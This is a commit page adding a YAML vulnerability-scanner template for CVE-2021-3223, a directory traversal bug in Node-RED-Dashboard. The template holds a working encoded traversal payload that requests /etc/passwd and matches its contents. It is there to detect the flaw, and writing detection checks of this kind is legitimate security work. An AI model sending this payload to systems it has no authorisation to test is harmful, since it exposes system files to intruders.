Merge pull request #1771 from gy741/rule-add-v7

Create CVE-2021-3223.yaml
patch-1
Sandeep Singh 2021-06-28 21:43:59 +05:30 committed by GitHub
commit 40782db039
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions

View File

@ -0,0 +1,21 @@
id: CVE-2021-3223
info:
name: Node RED Dashboard - Directory Traversal
author: gy741
severity: high
description: Node-RED-Dashboard before 2.26.2 allows ui_base/js/..%2f directory traversal to read files.
reference: |
- https://github.com/node-red/node-red-dashboard/issues/669
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223
tags: cve,cve2020,node-red-dashboard,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"